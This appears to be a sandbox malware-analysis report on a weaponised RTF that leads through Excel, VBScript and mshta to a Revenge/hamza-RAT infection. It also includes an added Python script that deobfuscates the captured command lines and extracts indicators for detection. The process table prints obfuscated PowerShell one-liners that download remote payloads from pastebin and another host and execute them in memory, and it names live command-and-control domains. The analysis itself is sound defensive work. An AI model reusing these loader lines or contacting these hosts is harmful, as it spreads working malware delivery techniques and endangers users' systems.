| Field | Value |
|---|---|
| File name | f3c5d8c75e64ddea1c6e446899910c76 |
| Full analysis | https://app.any.run/tasks/91cf4db7-3133-4176-b845-65467f5fffe3 |
| Verdict | Malicious activity |
| Analysis date | July 18, 2019, 03:05:21 |
| OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Indicators | |
| MIME | text/rtf |
| File info | Rich Text Format data, version 1, unknown character set |
| MD5 | F3C5D8C75E64DDEA1C6E446899910C76 |
| SHA1 | 43EEAF9662FC56EEF8FDAD8E5C4745CD47D6E767 |
| SHA256 | E053EF659D1F9988AA446EF54846A4783DB3C793BF86D94BE4673906C384502E |
| SSDEEP | 24576:gvWOvWAvWdvWDvWLvWGvWVvWnvWQvWbvW2vWFvWcvWcvWzvWEvWHvW5vW5vW6vWC:H |
| File type | .rtf: Rich Text Format (100) |

| Document property | Value |
|---|---|
| Author | Karla |
| LastModifiedBy | Joselio Bonin |
| CreateDate | 2019:06:26 01:31:00 |
| ModifyDate | 2019:06:26 01:37:00 |
| RevisionNumber | 2 |
| TotalEditTime | 3 minutes |
| Pages | 1 |
| Words | 3 |
| Characters | 18 |
| CharactersWithSpaces | 20 |
| InternalVersionNumber | 105 |

| PID | CMD | Path | Indicators | Parent process |
|---|---|---|---|---|
| 3884 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\f3c5d8c75e64ddea1c6e446899910c76.rtf" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Exit code: 1; Version: 14.0.6024.1000 | | | |
| 2560 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Excel; Exit code: 1; Version: 14.0.6024.1000 | | | |
| 3156 | "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 6 > nul & start C:\Users\Public\OfficeWord.vbs | C:\Windows\System32\cmd.exe | — | EXCEL.EXE |
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | | | |
| 1768 | "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 7 > nul & start C:\Users\Public\Microsoft.vbs | C:\Windows\System32\cmd.exe | — | EXCEL.EXE |
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | | | |
| 2176 | ping 127.0.0.1 -n 6 | C:\Windows\system32\PING.EXE | — | cmd.exe |
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: TCP/IP Ping Command; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | | |
| 1736 | ping 127.0.0.1 -n 7 | C:\Windows\system32\PING.EXE | — | cmd.exe |
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: TCP/IP Ping Command; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | | |
| 4076 | "C:\Windows\System32\WScript.exe" "C:\Users\Public\OfficeWord.vbs" | C:\Windows\System32\WScript.exe | — | cmd.exe |
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft ® Windows Based Script Host; Exit code: 0; Version: 5.8.7600.16385 | | | |
| 3452 | "C:\Windows\System32\WScript.exe" "C:\Users\Public\Microsoft.vbs" | C:\Windows\System32\WScript.exe | — | cmd.exe |
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft ® Windows Based Script Host; Exit code: 0; Version: 5.8.7600.16385 | | | |
| 2780 | "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 > nul & mshta.exe vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('h'+'t'+'t'+'p'+'s:'+'//p'+'a'+'s'+'t'+'e'+'b'+'i'+'n'+'.'+'c'+'o'+'m'+'/'+'r'+'a'+'w'+'/'+'e8GrYbHb'))).EntryPoint.Invoke($N,$N)",0,true)(window.close) | C:\Windows\System32\cmd.exe | — | WScript.exe |
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | | | |
| 3484 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit [Byte[]]$sc64= iex(iex('(&(GCM *W-O*)'+ 'Net.'+'WebC'+'lient)'+'.Dow'+'nload'+'Str'+'ing(''http://www.m9c.net/uploads/15615146751.jpg'').replace(''*'',''x0'')'));[<##>AppDomain<##>]::<##>('^urrentDomain'.replace('^','C'))<##>.<##>('%oad'.replace('%','L'))($sc64).'EntryPoint'<##>.<##>('in@okg'.replace('g','e').replace('@','v'))($null,$null) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | WScript.exe |
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | | |
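The process tree above is the useful part of this report: Word opens the RTF, an embedded Excel object is activated out of process (EXCEL.EXE -Embedding with svchost.exe as parent, the usual sign of a DCOM-launched OLE server), Excel drops two VBScripts into C:\Users\Public and starts each one behind a `ping 127.0.0.1 -n N` delay, and the scripts hand off to mshta and powershell whose command lines hide their URLs and .NET method names behind `'a'+'b'` concatenation, `'literal'.replace()` chains and empty `<##>` block comments. The following helper is an added example, not part of the any.run report or of the sample: it copies the four relevant command lines verbatim from the table, undoes those three obfuscation tricks with regular expressions, and extracts the indicators a detection rule would key on. The `(&(GCM *W-O*)` wildcard lookup (Get-Command resolving to New-Object) and the `.replace('*','x0')` applied to the downloaded "jpg" are left alone on purpose: the first needs a PowerShell runtime to resolve and the second operates on remote content that is not on this page.

```python
"""Added triage helper for the obfuscated command lines in the process tree.

Not part of the any.run report: a regex deobfuscator for the three tricks
used by PIDs 2780 and 3484 (empty <##> block comments, 'a'+'b' string
concatenation, 'literal'.replace('x','y') chains), plus indicator extraction.
"""
import re

# Command lines copied verbatim from the process table on this page, keyed by PID.
CMDLINES = {
    3156: r'''"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 6 > nul & start C:\Users\Public\OfficeWord.vbs''',
    1768: r'''"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 7 > nul & start C:\Users\Public\Microsoft.vbs''',
    2780: r'''"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 > nul & mshta.exe vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('h'+'t'+'t'+'p'+'s:'+'//p'+'a'+'s'+'t'+'e'+'b'+'i'+'n'+'.'+'c'+'o'+'m'+'/'+'r'+'a'+'w'+'/'+'e8GrYbHb'))).EntryPoint.Invoke($N,$N)",0,true)(window.close)''',
    3484: r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit [Byte[]]$sc64= iex(iex('(&(GCM *W-O*)'+ 'Net.'+'WebC'+'lient)'+'.Dow'+'nload'+'Str'+'ing(''http://www.m9c.net/uploads/15615146751.jpg'').replace(''*'',''x0'')'));[<##>AppDomain<##>]::<##>('^urrentDomain'.replace('^','C'))<##>.<##>('%oad'.replace('%','L'))($sc64).'EntryPoint'<##>.<##>('in@okg'.replace('g','e').replace('@','v'))($null,$null)''',
}

COMMENT_RE = re.compile(r"<#.*?#>", re.S)                 # <##> padding between tokens
CONCAT_RE = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")     # 'a' + 'b'  ->  'ab'
REPLACE_RE = re.compile(                                   # 'lit'.replace('x','y') with literal args
    r"'([^']*)'\.replace\('([^']*)'\s*,\s*'([^']*)'\)", re.I)
URL_RE = re.compile(r"https?://[^\s'\"()<>]+", re.I)
PING_RE = re.compile(r"ping\s+127\.0\.0\.1\s+-n\s+(\d+)", re.I)   # ping-as-sleep idiom
DROP_RE = re.compile(r"c:\\users\\public\\[^\s'\"]+\.vbs", re.I)  # script dropped to a world-writable dir


def deobfuscate(cmd: str) -> str:
    """Strip block comments, then fold concatenations and literal .replace()
    calls until the string stops changing (each pass can expose new work)."""
    cur = COMMENT_RE.sub("", cmd)
    prev = None
    while cur != prev:
        prev = cur
        cur = CONCAT_RE.sub(lambda m: f"'{m.group(1)}{m.group(2)}'", cur)
        cur = REPLACE_RE.sub(
            lambda m: "'" + m.group(1).replace(m.group(2), m.group(3)) + "'"
            if m.group(2) else m.group(0),
            cur)
    return cur


def extract_urls(cmd: str) -> list[str]:
    """URLs visible only after deobfuscation; case preserved (paste IDs are case-sensitive)."""
    return sorted(set(URL_RE.findall(deobfuscate(cmd))))


def triage(cmd: str) -> dict:
    """Behavioural indicators for one command line."""
    plain = deobfuscate(cmd)
    low = plain.lower()
    # ('CurrentDomain').('Load') is PowerShell member access via string; flatten it
    # to currentdomain.load so the same substring check covers both spellings.
    flat = re.sub(r"[()']", "", low)
    ping = PING_RE.search(low)
    drop = DROP_RE.search(low)
    return {
        "ping_delay_count": int(ping.group(1)) if ping else None,  # -n N ~= N-1 seconds of sleep
        "dropped_script": drop.group(0) if drop else None,
        "mshta_vbscript": "mshta" in low and "vbscript:" in low,
        "download_string": "downloadstring" in flat,
        "assembly_load": "::load" in flat or "currentdomain.load" in flat,
        "entrypoint_invoke": "entrypoint.invoke" in flat,
        "urls": extract_urls(cmd),
    }


if __name__ == "__main__":
    for pid, cmd in CMDLINES.items():
        print(pid, triage(cmd))
```

Run as a script it prints one indicator dictionary per PID; the two URLs it recovers (https://pastebin.com/raw/e8GrYbHb and http://www.m9c.net/uploads/15615146751.jpg) match the pastebin.com connections in the network table below, and the `ping_delay_count` values (6, 7, 10) explain the otherwise pointless PING.EXE children of cmd.exe.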

| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 3884 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRF81C.tmp.cvr | — | — | — |
| 2560 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR2A.tmp.cvr | — | — | — |
| 3484 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JX3EEC1XRVUNLBWUWTRF.temp | — | — | — |
| 2652 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR2527.tmp.cvr | — | — | — |
| 2924 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HP5SI8Y75Q06IOZCBERL.temp | — | — | — |
| 2560 | EXCEL.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\yvyE642L[1].txt | text | 7F2A202549A7CE9E21FA866B234E6E1F | 81D128737CE4EC69BCAB76FFA039B80C84A1E8001DB603029DA878E766BD0E9D |
| 2560 | EXCEL.EXE | C:\Users\Public\OfficeWord.vbs | text | 7F2A202549A7CE9E21FA866B234E6E1F | 81D128737CE4EC69BCAB76FFA039B80C84A1E8001DB603029DA878E766BD0E9D |
| 3484 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFe2362.TMP | binary | E4D9C442DD447A8FA05F9CFE88FCBB69 | EDD7D7597C6C79A1DFD3229A1FA23433329B1D8399EB558623FFF948D3BB4036 |
| 2560 | EXCEL.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\qzduaLGZ[1].txt | text | E6896FCD01487D21DFEF7326A34AFF8E | 45E45D2932816B14665F65EE4FC1AA7473B29031DA1612D3D909F867C618D80E |
| 3884 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | 9C8E9F7DA8C5639E962201B54893874F | ED894FB76B582682A53A8210F617C702B4B53BCFE10ACB9FD7AA09B96BA06E53 |

| PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
| 2924 | powershell.exe | 152.246.81.100:80 | bylgay.hopto.org | TELEFÔNICA BRASIL S.A | BR | malicious |
| 2924 | powershell.exe | 104.20.208.21:443 | pastebin.com | Cloudflare Inc | US | shared |
| 2560 | EXCEL.EXE | 104.20.209.21:443 | pastebin.com | Cloudflare Inc | US | shared |

| Domain | IP | Reputation |
|---|---|---|
| pastebin.com | | shared |
| bylgay.hopto.org | | malicious |

| PID | Process | Class | Message |
|---|---|---|---|
| 2924 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] Revenge/hamza-RAT CnC Checkin |
| 2924 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] Revenge/hamza-RAT CnC Checkin |
| 2924 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] Revenge/hamza-RAT CnC Checkin |
| 2924 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] Revenge/hamza-RAT CnC Checkin |
| 2924 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] Revenge/hamza-RAT CnC Checkin |
| 2924 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] Revenge/hamza-RAT CnC Checkin |
| 2924 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] Revenge/hamza-RAT CnC Checkin |
| 2924 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] Revenge/hamza-RAT CnC Checkin |
| 2924 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] Revenge/hamza-RAT CnC Checkin |
| 2924 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] Revenge/hamza-RAT CnC Checkin |